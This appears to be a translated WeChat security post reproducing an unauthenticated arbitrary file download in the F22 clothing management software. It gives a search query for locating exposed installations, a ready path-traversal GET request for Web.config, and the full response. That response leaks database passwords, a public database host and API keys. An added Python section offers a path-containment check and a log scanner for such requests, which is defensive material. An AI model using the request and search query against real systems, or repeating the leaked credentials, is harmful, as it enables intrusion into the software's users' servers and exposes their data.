Statement
Most articles on this official account come from the author's daily study notes; some are reposted with the author's authorization or from other whitelisted official accounts. Reposting without authorization is strictly prohibited; to repost, contact us for whitelisting. Do not use the techniques in these articles for illegal testing; any adverse consequences arising from doing so are unrelated to the article's author and this official account.
Vulnerability description
Guangzhou Jinmingtai Software Technology Co., Ltd. (广州锦铭泰软件科技有限公司) is a high-tech company specializing in IT solutions for branded apparel, footwear and bag enterprises. The F22 clothing management software system developed by the company exposes an interface without authorization checks: the unauthenticated endpoint /oa/isprit/module/openfile.aspx has an arbitrary file download vulnerability. An attacker can ultimately use it to obtain sensitive information.
Asset collection
web.title:"F22WEB登陆"
Only targets showing the icon in the figure below are this system.
Vulnerability reproduction
Craft the request
GET /oa/isprit/module/openfile.aspx?Url=......Web.config HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Response
HTTP/1.1 200 OK
Date: Tue, 28 Nov 2023 01:44:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Content-Disposition: attachment;filename=Web.config
Cache-Control: private
Content-Type: application/x-config
Content-Length: 10777
<!--
Note: In addition to manually editing this file, you can also use
the Web Admin Tool to configure settings for your application. Use the
"Website" -> "Asp.Net Configuration" option in Visual Studio.
A full list of settings and comments can be found in
machine.config.comments, which is usually located in
\Windows\Microsoft.Net\Framework\v2.x\Config
-->
<configuration>
<appSettings>
<add key="CrystalImageCleaner-AutoStart" value="true" />
<add key="CrystalImageCleaner-Sleep" value="60000" />
<add key="CrystalImageCleaner-Age" value="120000" />
<!--CRM configuration parameters are now read from f18books per account set-->
<!--<add key="key" value="LODEPBIGBOSS^SDDE._[@##@**ZS"/>
<add key="BigBossService" value="http://218.244.156.72:56/BigBossService.svc"/>-->
<!--Parameters for mobile app calls: database, WeChat KEY-->
<add key="appDbName" value="f22x" />
<add key="appKey" value="fefd752acb51741d239dc69b73df4be8" />
<add key="apiKey" value="LODEPBIGBOSS^SDDE!()zhx" />
<add key="baiduak" value="I00klIYKAL85NZM5QoTtIf4swUUvn5Bl" />
</appSettings>
<connectionStrings>
<add name="ec" connectionString="Data Source=124.42.240.23,5280;Initial Catalog=ec;Pooling=true;Max Pool Size=300;Min Pool Size=0;Persist Security Info=True;uid=sa;pwd=zhxit123" providerName="System.Data.SqlClient" />
<add name="webconn" connectionString="Data Source=.;Initial Catalog=cw3d028_db;Pooling=true;Max Pool Size=300;Min Pool Size=0;Persist Security Info=True;uid=sa;pwd=njyzc" providerName="System.Data.SqlClient" />
<add name="mdburl" connectionString="Data Source=.;Initial Catalog=voa;Pooling=true;Max Pool Size=300;Min Pool Size=0;Persist Security Info=True;uid=sa;pwd=njyzc" providerName="System.Data.SqlClient" />
<add name="f21mdb" connectionString="Data Source=.;Initial Catalog=f22j;Pooling=true;Max Pool Size=300;Min Pool Size=0;Persist Security Info=True;uid=sa;pwd=njyzc" providerName="System.Data.SqlClient" />
<add name="f18master" connectionString="Data Source=.;Initial Catalog=f18master;Pooling=true;Max Pool Size=300;Min Pool Size=0;Persist Security Info=True;uid=sa;pwd=njyzc" providerName="System.Data.SqlClient" />
<add name="f117picture" connectionString="Data Source=.;Initial Catalog=F117Picture;Pooling=true;Max Pool Size=300;Min Pool Size=0;Persist Security Info=True;uid=sa;pwd=njyzc" providerName="System.Data.SqlClient" />
<add name="carcn" connectionString="Data Source=.;Initial Catalog=cashcard;Pooling=true;Max Pool Size=300;Min Pool Size=0;Persist Security Info=True;uid=sa;pwd=njyzc" providerName="System.Data.SqlClient" />
<add name="oraconn" connectionString="DATA SOURCE=(DESCRIPTION=(CID=GTU_APP)(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=jackie-work)(PORT=1521)))(CONNECT_DATA=(SID=orcl)(SERVER=DEDICATED)));USER ID=zhxf22;PASSWORD=ml350;" providerName="System.Data.OracleClient" />
</connectionStrings>
<system.web>
<httpRuntime maxRequestLength="104857600" useFullyQualifiedRedirectUrl="false" />
<!--requestValidationMode="2.0" -->
<httpHandlers>
<add verb="*" path="openfile.aspx" type="filedown,filedown" />
<add verb="GET" path="CrystalImageHandler.aspx" type="CrystalDecisions.Web.CrystalImageHandler, CrystalDecisions.Web, Version=10.5.3700.0, Culture=neutral, PublicKeyToken=692fbea5521e1304" />
</httpHandlers>
<!--
Set compilation debug="true" to insert debugging symbols
into the compiled page. Because this
affects performance, set this value to true only
during development.
Visual Basic options:
Set strict="true" to disallow all data type conversions
where data loss can occur.
Set explicit="true" to force declaration of all variables.
-->
<compilation debug="true" strict="false" explicit="true" targetFramework="4.0">
<assemblies>
<add assembly="Infragistics2.WebUI.Shared.v6.2, Version=6.2.20062.34, Culture=neutral, PublicKeyToken=7DD5C3163F2CD0CB" />
<add assembly="Infragistics2.WebUI.UltraWebChart.v6.2, Version=6.2.20062.34, Culture=neutral, PublicKeyToken=7DD5C3163F2CD0CB" />
<add assembly="Infragistics2.WebUI.WebHtmlEditor.v6.2, Version=6.2.20062.34, Culture=neutral, PublicKeyToken=7DD5C3163F2CD0CB" />
<add assembly="Infragistics2.WebUI.WebSchedule.v6.2, Version=6.2.20062.34, Culture=neutral, PublicKeyToken=7DD5C3163F2CD0CB" />
<add assembly="Infragistics2.WebUI.WebNavBar.v6.2, Version=6.2.20062.34, Culture=neutral, PublicKeyToken=7DD5C3163F2CD0CB" />
<add assembly="Infragistics2.WebUI.UltraWebToolbar.v6.2, Version=6.2.20062.34, Culture=neutral, PublicKeyToken=7DD5C3163F2CD0CB" />
<add assembly="Infragistics2.WebUI.UltraWebGrid.v6.2, Version=6.2.20062.34, Culture=neutral, PublicKeyToken=7DD5C3163F2CD0CB" />
<add assembly="Infragistics2.WebUI.UltraWebTab.v6.2, Version=6.2.20062.34, Culture=neutral, PublicKeyToken=7DD5C3163F2CD0CB" />
<add assembly="Infragistics2.WebUI.WebCombo.v6.2, Version=6.2.20062.34, Culture=neutral, PublicKeyToken=7DD5C3163F2CD0CB" />
<add assembly="Infragistics2.WebUI.WebScheduleDataProvider.v6.2, Version=6.2.20062.34, Culture=neutral, PublicKeyToken=7DD5C3163F2CD0CB" />
<add assembly="Infragistics2.WebUI.UltraWebNavigator.v6.2, Version=6.2.20062.34, Culture=neutral, PublicKeyToken=7DD5C3163F2CD0CB" />
<add assembly="System.Design, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />
<add assembly="System.DirectoryServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />
<add assembly="System.Data.OracleClient, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089" />
<add assembly="Microsoft.JScript, Version=10.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />
<add assembly="System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />
<add assembly="System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089" />
<add assembly="System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />
<add assembly="System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />
<add assembly="System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089" />
<add assembly="System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089" />
<add assembly="System.Web.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />
<add assembly="System.DirectoryServices.Protocols, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />
<add assembly="System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />
<add assembly="System.ServiceProcess, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />
<add assembly="System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089" />
<add assembly="System.Web.RegularExpressions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />
<add assembly="CrystalDecisions.CrystalReports.Engine, Version=10.5.3700.0, Culture=neutral, PublicKeyToken=692FBEA5521E1304" />
<add assembly="CrystalDecisions.Data.AdoDotNetInterop, Version=10.5.3700.0, Culture=neutral, PublicKeyToken=692FBEA5521E1304" />
<add assembly="CrystalDecisions.ReportSource, Version=10.5.3700.0, Culture=neutral, PublicKeyToken=692FBEA5521E1304" />
<add assembly="CrystalDecisions.Shared, Version=10.5.3700.0, Culture=neutral, PublicKeyToken=692FBEA5521E1304" />
<add assembly="CrystalDecisions.Web, Version=10.5.3700.0, Culture=neutral, PublicKeyToken=692FBEA5521E1304" />
<add assembly="CrystalDecisions.Windows.Forms, Version=10.5.3700.0, Culture=neutral, PublicKeyToken=692FBEA5521E1304" />
</assemblies>
</compilation>
<pages validateRequest="false" controlRenderingCompatibilityVersion="3.5" clientIDMode="AutoID">
<namespaces>
<clear />
<add namespace="System" />
<add namespace="System.Collections" />
<add namespace="System.Collections.Specialized" />
<add namespace="System.Configuration" />
<add namespace="System.Text" />
<add namespace="System.Text.RegularExpressions" />
<add namespace="System.Web" />
<add namespace="System.Web.Caching" />
<add namespace="System.Web.SessionState" />
<add namespace="System.Web.Security" />
<add namespace="System.Web.Profile" />
<add namespace="System.Web.UI" />
<add namespace="System.Web.UI.WebControls" />
<add namespace="System.Web.UI.WebControls.WebParts" />
<add namespace="System.Web.UI.HtmlControls" />
</namespaces>
</pages>
<!--
The <customErrors> section enables configuration
of what to do if/when an unhandled error occurs
during the execution of a request. Specifically,
it enables developers to configure html error pages
to be displayed in place of an error stack trace.-->
<customErrors mode="off" />
<sessionState timeout="600" />
<globalization requestEncoding="utf-8" responseEncoding="utf-8" />
</system.web>
<system.webServer>
<security>
<requestFiltering>
<requestLimits maxAllowedContentLength="104857600" />
</requestFiltering>
</security>
<handlers>
<remove name="zhx" />
<add name="openfile.aspx_*" path="openfile.aspx" verb="*" type="filedown,filedown" />
<add name="CrystalImageHandler.aspx_GET" verb="GET" path="CrystalImageHandler.aspx" type="CrystalDecisions.Web.CrystalImageHandler, CrystalDecisions.Web, Version=10.5.3700.0, Culture=neutral, PublicKeyToken=692fbea5521e1304" preCondition="integratedMode" />
</handlers>
<validation validateIntegratedModeConfiguration="false" />
<defaultDocument>
<files>
<clear />
<add value="reloginzt.aspx" />
<add value="default.aspx" />
<add value="Default.htm" />
<add value="Default.asp" />
<add value="index.htm" />
<add value="index.asp" />
</files>
</defaultDocument>
<directoryBrowse enabled="false" />
</system.webServer>
<system.web.extensions>
<scripting>
<webServices>
<jsonSerialization maxJsonLength="902400000" />
</webServices>
</scripting>
</system.web.extensions>
</configuration>
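The defender's view of the openfile.aspx?Url=... pattern above, as an added example in Python (not code from the original post or from the F22 product): safe_download_path() is the containment check a file-download handler must apply so a Url value cannot leave the download root, and flag_iis_log_line() scans IIS W3C log lines for requests to openfile.aspx whose Url parameter traverses directories or names Web.config. DOWNLOAD_ROOT, the log field order and the sample log lines are assumptions constructed for the example.

```python
import os
import re
from urllib.parse import unquote

DOWNLOAD_ROOT = "/srv/f22/downloads"  # hypothetical root; the real handler's root is not on the page
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")  # ".." as a whole path component

def normalize(raw):
    """Decode twice (double-encoded sequences survive one decode) and unify separators."""
    return unquote(unquote(raw)).replace("\\", "/")

def safe_download_path(root, requested):
    """Resolve a user-supplied name under root; None if it escapes root."""
    real_root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(real_root, normalize(requested).lstrip("/")))
    # commonpath is a true containment test, unlike a startswith() prefix check
    if os.path.commonpath([real_root, candidate]) != real_root:
        return None
    return candidate

def flag_iis_log_line(line):
    """Reason string for a suspicious openfile.aspx request, else None.
    Assumed W3C field order: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status."""
    fields = line.split()
    if len(fields) < 7:
        return None
    _, _, client_ip, _, stem, query, status = fields[:7]
    if not stem.lower().endswith("/openfile.aspx"):
        return None
    params = {k.lower(): v for k, _, v in (p.partition("=") for p in query.split("&"))}
    target = normalize(params.get("url", ""))
    if TRAVERSAL.search(target):
        return f"{client_ip} traversal via Url={params['url']} (HTTP {status})"
    if target.lower().endswith("web.config"):
        return f"{client_ip} Web.config requested via Url={params['url']} (HTTP {status})"
    return None

def scan_log(text):
    """Apply flag_iis_log_line to every line; return the findings."""
    return [hit for hit in map(flag_iis_log_line, text.splitlines()) if hit]

# Constructed sample log (RFC 5737 documentation addresses), not real traffic.
SAMPLE_LOG = """\
2023-11-28 01:44:06 203.0.113.10 GET /oa/isprit/module/openfile.aspx Url=..%5C..%5CWeb.config 200
2023-11-28 01:44:09 203.0.113.10 GET /oa/isprit/module/openfile.aspx Url=..%2F..%2Fweb.config 200
2023-11-28 01:45:01 198.51.100.7 GET /oa/isprit/module/openfile.aspx Url=reports%2F2023.pdf 200
2023-11-28 01:45:30 198.51.100.7 GET /oa/default.aspx - 200
"""
```

scan_log(SAMPLE_LOG) returns the two flagged requests from the first client and ignores the ordinary download and the unrelated page; the same containment check in safe_download_path() rejects both traversal forms while still serving reports/2023.pdf.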
Originally published on the WeChat official account (Devil安全): [Vulnerability Reproduction] F22 clothing management software system openfile.aspx unauthenticated arbitrary file download